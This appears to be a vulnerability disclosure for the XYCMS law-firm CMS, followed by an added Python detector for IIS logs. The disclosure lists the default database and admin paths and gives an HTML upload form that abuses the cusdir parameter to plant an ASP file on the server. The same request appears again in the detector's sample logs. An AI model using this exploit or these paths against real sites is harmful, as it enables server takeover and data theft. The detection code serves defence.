By Mr. DzY from www.0855.TV
Source code introduction:
The XYCMS law firm website construction system includes the following sections: office profile, legal style, news center, service field, typical cases, legal consultation, qualification certification, and contact us.
Back-end functions:
Enterprise information management: basic information management, addition, online registration information management, and Q&A center information management.
News center management: manages news content and related categories, and adds or deletes news items.
Lawyer management: manages, adds, and deletes law firms.
Source code download: http://www.bkjia.com/ym/201109/29273.html
http://www.yuleroom.cn
Default database: http://www.bkjia.com/xydata/xycms.mdb
Default admin back end: http://www.bkjia.com/system/index.asp
Exploit:
<form action="http://www.bkjia.com/system/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method="post" name="myform" enctype="multipart/form-data">
<input type="file" name="uploadfile" size="100"><br>
<input type="submit" value="upload">
</form>
Fix: For more information about upload vulnerabilities, see previous articles on this site.
PS: In analyticdb 1.0, Niu has already published several problems: http://www.bkjia.com/article/201102/83752.html, so I won't repeat them.
This one was not mentioned there, so I am adding it. It is a rather minor issue; if there is anything similar elsewhere, it is purely coincidental.
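
A defensive check for the request made by the exploit form above, added here as an example (it is not code from the original post or from XYCMS): it scans IIS W3C-format access logs for requests to the upload endpoint whose cusdir value is not a plain folder name. The allow-list pattern, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Endpoint from the form on this page; IIS paths are case-insensitive.
UPLOAD_STEM = "/system/xyewebeditor/asp/upload.asp"
# Assumption: a legitimate cusdir is empty or a plain folder name (no dots or separators).
SAFE_CUSDIR = re.compile(r"[A-Za-z0-9_-]{0,32}")

# Constructed sample in IIS W3C extended log format (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-09-20 10:01:02 192.0.2.10 POST /system/xyeWebEditor/asp/upload.asp action=save&type=image&style=popup 200
2011-09-20 10:05:40 198.51.100.7 POST /system/xyeWebEditor/asp/upload.asp action=save&type=image&style=popup&cusdir=Mr.DzY.asp 200
2011-09-20 10:06:11 192.0.2.10 GET /system/index.asp - 200
2011-09-20 10:07:30 192.0.2.11 POST /system/xyeWebEditor/asp/upload.asp action=save&type=image&cusdir=news2011 200
""".splitlines()


def suspicious_uploads(log_lines):
    """Return (client_ip, cusdir) for upload requests whose cusdir fails the allow-list."""
    fields, hits = [], []
    for line in log_lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != UPLOAD_STEM:
            continue
        # parse_qsl percent-decodes values; ASP reads parameter names case-insensitively.
        for key, value in parse_qsl(row.get("cs-uri-query", ""), keep_blank_values=True):
            if key.lower() == "cusdir" and not SAFE_CUSDIR.fullmatch(value):
                hits.append((row.get("c-ip", "?"), value))
    return hits


if __name__ == "__main__":
    for ip, cusdir in suspicious_uploads(SAMPLE_LOG):
        print(f"unsafe cusdir {cusdir!r} from {ip}")
```

The same allow-list can be applied on the server to reject the cusdir parameter before an upload is saved.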